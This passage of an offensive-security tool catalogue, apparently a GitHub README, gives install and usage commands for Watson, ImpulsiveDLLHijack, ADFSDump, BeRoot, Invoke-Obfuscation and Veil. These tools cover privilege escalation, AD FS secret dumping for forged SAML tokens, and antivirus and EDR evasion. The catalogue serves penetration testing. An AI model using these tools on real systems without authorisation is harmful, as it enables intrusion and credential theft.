1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWatson is a .NET tool designed to enumerate missing KBs 
and suggest exploits for Privilege Escalation vulnerabilities.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eGreat for identifying missing patches and suggesting exploits that could be used to exploit known vulnerabilities in order to gain higher privileges on the system.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eUsing \u003ca href=\"https://visualstudio.microsoft.com/vs/community/\" rel=\"nofollow\"\u003eVisual Studio 2019 Community Edition\u003c/a\u003e. Open the \u003ca href=\"https://github.com/rasta-mouse/Watson\"\u003eWatson project .sln\u003c/a\u003e, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run all checks\nWatson.exe\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run all checks\u003c/span\u003e\nWatson.exe\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210182370-409be1ac-64f9-4a07-96bd-b0752d7609a2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage text used from \u003ca href=\"https://github.com/rasta-mouse/Watson#usage\"\u003ehttps://github.com/rasta-mouse/Watson#usage\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
href=\"https://github.com/knight0x07/ImpulsiveDLLHijack\"\u003eImpulsiveDLLHijack\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-impulsivedllhijack\" class=\"anchor\" aria-label=\"Permalink: 🔙ImpulsiveDLLHijack\" href=\"#impulsivedllhijack\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA C# based tool that automates the process of discovering and exploiting DLL Hijacks in target binaries.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe discovered Hijacked paths can be weaponized, during an engagement, to evade EDR's.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003cstrong\u003eProcmon.exe\u003c/strong\u003e -\u0026gt; \u003ca href=\"https://docs.microsoft.com/en-us/sysinternals/downloads/procmon\" rel=\"nofollow\"\u003ehttps://docs.microsoft.com/en-us/sysinternals/downloads/procmon\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCustom Confirmatory DLL's\u003c/strong\u003e :\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eThese are DLL files which assist the tool to get the confirmation whether the DLL's are been successfully loaded from the identified hijack path\u003c/li\u003e\n\u003cli\u003eCompiled from the MalDLL project provided 
in the repository referenced in the Confirmatory DLL build steps below; precompiled binaries are also offered, but build them from source and inspect what they do before dropping a DLL onto a target\u003c/li\u003e\n\u003cli\u003e32Bit dll name should be: maldll32.dll\u003c/li\u003e\n\u003cli\u003e64Bit dll name should be: maldll64.dll\u003c/li\u003e\n\u003cli\u003eInstall NuGet Package: \u003cstrong\u003ePeNet\u003c/strong\u003e -\u0026gt; \u003ca href=\"https://www.nuget.org/packages/PeNet/\" rel=\"nofollow\"\u003ehttps://www.nuget.org/packages/PeNet/\u003c/a\u003e (Prereq while compiling the ImpulsiveDLLHijack project)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote: Procmon.exe and the confirmatory DLLs (the first two prerequisites above) should be placed in the same directory as ImpulsiveDLLHijack.exe.\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eBuild and Setup Information:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eImpulsiveDLLHijack\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eClone the repository in Visual Studio\u003c/li\u003e\n\u003cli\u003eOnce project is loaded in Visual Studio go to \"Project\" --\u0026gt; \"Manage NuGet packages\" --\u0026gt; Browse for packages and install \"PeNet\" -\u0026gt; \u003ca href=\"https://www.nuget.org/packages/PeNet/\" rel=\"nofollow\"\u003ehttps://www.nuget.org/packages/PeNet/\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBuild the project!\u003c/li\u003e\n\u003cli\u003eThe ImpulsiveDLLHijack.exe will be inside the bin directory.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eAnd for Confirmatory DLL's:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eClone the repository in Visual Studio\u003c/li\u003e\n\u003cli\u003eBuild the project with x86 and x64\u003c/li\u003e\n\u003cli\u003eRename x86 release as maldll32.dll and x64 release as 
maldll64.dll\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eSetup:\u003c/strong\u003e Copy the Confirmatory DLL's (maldll32 \u0026amp; maldll64) in the ImpulsiveDLLHijack.exe directory \u0026amp; then execute ImpulsiveDLLHijack.exe :))\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eInstall instructions from \u003ca href=\"https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites\"\u003ehttps://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Help\nImpulsiveDLLHijack.exe -h\n\n# Look for vulnerabilities in an executable \nImpulsiveDLLHijack.exe -path BINARY_PATH\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help\u003c/span\u003e\nImpulsiveDLLHijack.exe -h\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Look for vulnerabilities in an executable \u003c/span\u003e\nImpulsiveDLLHijack.exe -path BINARY_PATH\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eUsage examples can be found \u003ca href=\"https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210267803-cefee62b-f16d-4768-81d0-9001ef1a2b98.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used 
from \u003ca href=\"https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples\"\u003ehttps://github.com/knight0x07/ImpulsiveDLLHijack#4-examples\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/mandiant/ADFSDump\"\u003eADFSDump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-adfsdump\" class=\"anchor\" aria-label=\"Permalink: 🔙ADFSDump\" href=\"#adfsdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA C# tool to dump all sorts of goodies from AD FS.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCreated by Doug Bienstock \u003ca href=\"https://twitter.com/doughsec\" rel=\"nofollow\"\u003e@doughsec\u003c/a\u003e while at Mandiant FireEye.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis tool is designed to be run in conjunction with ADFSpoof. 
ADFSdump will output all of the information needed in order to generate security tokens using ADFSpoof.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eRequirements:\u003c/strong\u003e\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eADFSDump must be run under the user context of the AD FS service account. You can get this information by running a process listing on the AD FS server or from the output of the Get-ADFSProperties cmdlet. Only the AD FS service account has the permissions needed to access the configuration database. Not even a DA can access this.\u003c/li\u003e\n\u003cli\u003eADFSDump assumes that the service is configured to use the Windows Internal Database (WID). Although it would be trivial to support an external SQL server, this feature does not exist right now.\u003c/li\u003e\n\u003cli\u003eADFSDump must be run locally on an AD FS server, NOT an AD FS web application proxy. The WID can only be accessed locally via a named pipe.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eADFSDump was built against .NET 4.5 with Visual Studio 2017 Community Edition. Simply open up the project .sln, choose \"Release\", and build.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Flags)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# The Active Directory domain to target. Defaults to the current domain.\n/domain:\n\n# The Domain Controller to target. Defaults to the current DC.\n/server:\n\n# Switch. Toggle to disable outputting the DKM key.\n/nokey\n\n# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.\n/database\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e The Active Directory domain to target. 
Defaults to the current domain.\u003c/span\u003e\n/domain:\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e The Domain Controller to target. Defaults to the current DC.\u003c/span\u003e\n/server:\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Switch. Toggle to disable outputting the DKM key.\u003c/span\u003e\n/nokey\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.\u003c/span\u003e\n/database\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs\" rel=\"nofollow\"\u003eBlog - Exploring the Golden SAML Attack Against ADFS\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212204724-65da5505-3576-4e6d-91ab-989b96247182.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs\" rel=\"nofollow\"\u003ehttps://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/AlessandroZ/BeRoot\"\u003eBeRoot\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-beroot\" class=\"anchor\" aria-label=\"Permalink: 🔙BeRoot\" href=\"#beroot\"\u003e\u003csvg 
class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe goal of BeRoot is to only output potential privilege escalation opportunities and not a endpoint configuration assessment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis project works on Windows, Linux and Mac OS.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Linux)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/AlessandroZ/BeRoot\ncd BeRoot/Linux/\"\u003e\u003cpre\u003egit clone https://github.com/AlessandroZ/BeRoot\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e BeRoot/Linux/\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Windows)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eA pre-compiled version of BeRoot can be found \u003ca href=\"https://github.com/AlessandroZ/BeRoot/releases\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv 
class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run BeRoot\npython beroot.py\n\n# Run BeRoot with user password (If you know the password use it, you could get more results)\npython beroot.py --password super_strong_password\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run BeRoot\u003c/span\u003e\npython beroot.py\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run BeRoot with user password (If you know the password use it, you could get more results)\u003c/span\u003e\npython beroot.py --password super_strong_password\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFurther information can be found here for:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/AlessandroZ/BeRoot/tree/master/Linux\"\u003eLinux\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/AlessandroZ/BeRoot/tree/master/Windows\"\u003eWindows\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" 
href=\"https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/AlessandroZ/BeRoot\"\u003ehttps://github.com/AlessandroZ/BeRoot\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eDefense 
Evasion\u003c/h1\u003e\u003ca id=\"user-content-defense-evasion\" class=\"anchor\" aria-label=\"Permalink: Defense Evasion\" href=\"#defense-evasion\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/danielbohannon/Invoke-Obfuscation\"\u003eInvoke-Obfuscation\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-invoke-obfuscation\" class=\"anchor\" aria-label=\"Permalink: 🔙Invoke-Obfuscation\" href=\"#invoke-obfuscation\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/danielbohannon/Invoke-Obfuscation.git\"\u003e\u003cpre\u003egit clone https://github.com/danielbohannon/Invoke-Obfuscation.git\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./Invoke-Obfuscation\"\u003e\u003cpre\u003e./Invoke-Obfuscation\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Veil-Framework/Veil\"\u003eVeil\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-veil\" class=\"anchor\" aria-label=\"Permalink: 🔙Veil\" href=\"#veil\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 
1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eVeil is a tool for generating metasploit payloads that bypass common anti-virus solutions.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used to generate obfuscated shellcode, see the official \u003ca href=\"https://www.veil-framework.com/\" rel=\"nofollow\"\u003eveil framework blog\u003c/a\u003e for more info.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Kali)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"apt -y install veil\n/usr/share/veil/config/setup.sh --force --silent\"\u003e\u003cpre\u003eapt -y install veil\n/usr/share/veil/config/setup.sh --force --silent\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt-get -y install git\ngit clone https://github.com/Veil-Framework/Veil.git\ncd Veil/\n./config/setup.sh --force --silent\"\u003e\u003cpre\u003esudo apt-get -y install git\ngit clone https://github.com/Veil-Framework/Veil.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e Veil/\n./config/setup.sh --force --silent\u003c/pre\u003e\u003c/div\u003e\n\u003cp 
